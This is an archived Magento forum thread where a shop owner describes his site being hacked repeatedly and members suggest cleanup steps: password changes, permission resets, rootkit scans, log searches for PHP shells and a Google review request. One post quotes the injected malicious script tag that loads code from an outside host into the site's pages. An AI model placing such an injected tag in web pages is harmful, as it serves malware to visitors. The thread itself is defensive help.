Posting in the Magento forums has been disabled pending the implementation of a new and improved forum solution which should better serve the community.

For new questions please post at magento.stackexchange.com, the community-run support site for the Magento community. We will be providing updates on the new forum solution soon. For questions or concerns please email community@magento.com.

Magento Forum

Site Hacked Twice this Week
 
express33
Member
 
Total Posts:  52
Joined:  2009-06-29
 

Hi, my website keeps getting hacked, some russians who keep adding lines to the end of my index.php file.

I changed the permissions to: 444.

I fix it by removing the lines they add, but its annoying and resulting in loss of sales.

How do I stop them from disrupting service of my website.

What other procedures can I do to prevent them from hacking my site. if they can do this, what else can they do?

 
Magento Community Magento Community
Magento Community
Magento Community
 
NeilA
Moderator
 
Avatar
Total Posts:  1372
Joined:  2007-09-17
Blue Mountains, Oz
 

Couple of obvious things to check:

Do you have permission set correctly across the site? The attached script is very useful for doing that.
Have you:
Changed your FTP password to something strong?
Upgraded your FTP client to the latest version - most version releases are security related?
Changed your web host password?

File Attachments
magento-cleanup2.zip  (File Size: 2KB - Downloads: 193)
 
Magento Community Magento Community
Magento Community
Magento Community
 
Kaya Arseven
Jr. Member
 
Total Posts:  12
Joined:  2009-06-29
 

- Change your hosting account , ftp, email, database passwords.
- If you are using a crack ftp application , get rid of it.
- Download Malwarebytes from download.com and scan your computer in SAFE MODE.
- Make sure you don’t have any viruses or trojans in your own computer.

 
Magento Community Magento Community
Magento Community
Magento Community
 
Vincèn
Sr. Member
 
Avatar
Total Posts:  289
Joined:  2009-01-03
Grenoble, France
 

Check also that server itself is not compromised (use a rootkit search tool for that !). If you have any doubts about it, you’ll need to completely reinstall from scratch your server !

Vincèn

 
Magento Community Magento Community
Magento Community
Magento Community
 
express33
Member
 
Total Posts:  52
Joined:  2009-06-29
 

My site got hacked again, but this time Google warns customers that my site be giving out malware.

i found where these russian hackers inserted the text on a sitemap.html file

but i think that was just to fool me…

here is the code: I don’t know what file they altered.

the website is:

http://ezgmp.com/events/ezGXP-FDA-News.php

<link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/reset.css" media="all" />
<
link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/boxes.css" media="all" />
<
link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/menu.css" media="all" />
<
link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/clears.css" media="all" />
<
link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/print.css" media="print" />
<!--
[if IE]>
<
link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/iestyles.css" media="all" />
<!
[endif]-->
<!--
[if lt IE 7]>
<
script type="text/javascript" src="http://www.domain.com/js/index.php?c=auto&amp;f=,lib/ds-sleight.js,varien/iehover-fix.js" ></script>
<link rel="stylesheet" type="text/css" href="http://www.domain.com/skin/frontend/default/magento/css/ie7minus.css" media="all" />
<!
[endif]-->
<
script type="text/javascript">var Translator = new Translate([]);</script></head><script src=http://ezgmp.com/events/ezGXP-FDA-News.php ></script>
 
<body class=" cms-page-view cms-home">
    <
div class="no-display">

I think these hackers know my ftp password, because I changed the file permissions to 444, but when I checked this morning they had the files to “write” again.

> I use FileZilla to upload files.
> I’ve scanned my computer of viruses and malwarebytes - NOTHING
> changed my passwords

I have a question:

what should my file permissions for files and folders be? 444 or 555? or diffferent files/folders different things.

because i made skin folder 444 and then my site stopped working all together.

 
Magento Community Magento Community
Magento Community
Magento Community
 
Workwell
Member
 
Avatar
Total Posts:  63
Joined:  2010-05-05
London
 

It sounds like you have a hidden script running to re-generate the hack. There are three ways of solving this problem but as in all hacked sites the emphasis is to get it up and running asap. (So I\’ll try to keep it short)

As advised, change your FTP password and again after you have finished - you could even suspend your site and only allow your IP address until fixed.

To work out the problem, grab yourself a nice cup of tea and.... Relax, it\’s going to take 30mins to an hour to sort out!!

Ah.. That\’s better, now where to begin.

You will need to look at the whole file structure, a pain in the backside, but the more often you do this the more familiar you\’ll become.

1. I would look into the following files, malicious scripts hide by disguising themselves as genuine code especially google code. This is well documented and just about everywhere on the tinternet.

Files to check straight away: .htaccess, index.php, header and footer files - just about any file that is called on the majority of pages. (oscommerce hacks affected the application-top and includes files so I wouldn\’t overlook this for magento)

Look at the following folders: media/images, js. - rogue html and php files are hidden in here - there maybe a way setting this folder which disables the running of scripts (I have done it with oscommerce). Within these large files you will find URL for lots of sites that have nothing to do with you.

Check for files that have google validation references in the title and end with .php (in the root directory) loose files, careful you may have a genuine file or too in here.

Look for files with strange names that don\’t seem to fit in. ie. blue.php, calc.php etc. and take a look at the code, if it\’s very different to magento\’s usual structure it\’s probably malicious.

Great! I have removed all the files and code, now what!

Re-set file permissions with magento-cleanup.php (as previously suggested)

Change your FTP password again

2. Now we have to get google to remove the Trust screen when visiting your site - (That\’s not good what will our customers think / Bugger!!! I didn\’t stop adwords - urls not working ads now disproved… and on and on).

Once you are happy that you have removed all the code and malicious files, go to your website and click the link to re-submit your site to google for checking - it will take you off to a different page where you have to indicate that you have checked the site etc. and press submit - about an hour later wheyhey the sites live.

3. Backup everything:- Database and Site (Cause we\’re not going to get caught out again).

3b. Check your code again and keep checking it over a 48hr period - Now you know what you are looking for! If the malware returns within this period you will know you didn\’t get rid of all the code and files in the first place.

3c. In future - Routinely check your file structure and set up a log for all access and changes made to the root folder.

Now, go and get your tackle out here… http://www.ukfishingandcamping.com

 
Magento Community Magento Community
Magento Community
Magento Community
 
Workwell
Member
 
Avatar
Total Posts:  63
Joined:  2010-05-05
London
 

Also…

Change your admin login info and admin login URL eg. www.mymagentosite.com/admin to www.mymagentosite/fuksox18

 
Magento Community Magento Community
Magento Community
Magento Community
 
SimpleHelixcom
Enthusiast
 
Avatar
Total Posts:  906
Joined:  2007-08-31
Huntsville, AL
 

Hi there!

Suggestions seem to lean toward cleaning out your files, which is an important part, believe me!

But another thing you should definitely give a shot is searching your logs for possible hack sources.

For example:

cat ftp.log grep php grep Feb

For recently touched php files via FTP

cat site.log grep php grep POST

To search for php scripts that are receiving POST data (usually PHP shells stick out like a sore thumb)

 
Magento Community Magento Community
Magento Community
Magento Community
 
WebhostUK LTD
Sr. Member
 
Avatar
Total Posts:  163
Joined:  2009-08-27
UK
 

Install Suphp and suexec on your server , this will avoid nobody upload on your site.

 
Magento Community Magento Community
Magento Community
Magento Community
Magento Community
Magento Community
Back to top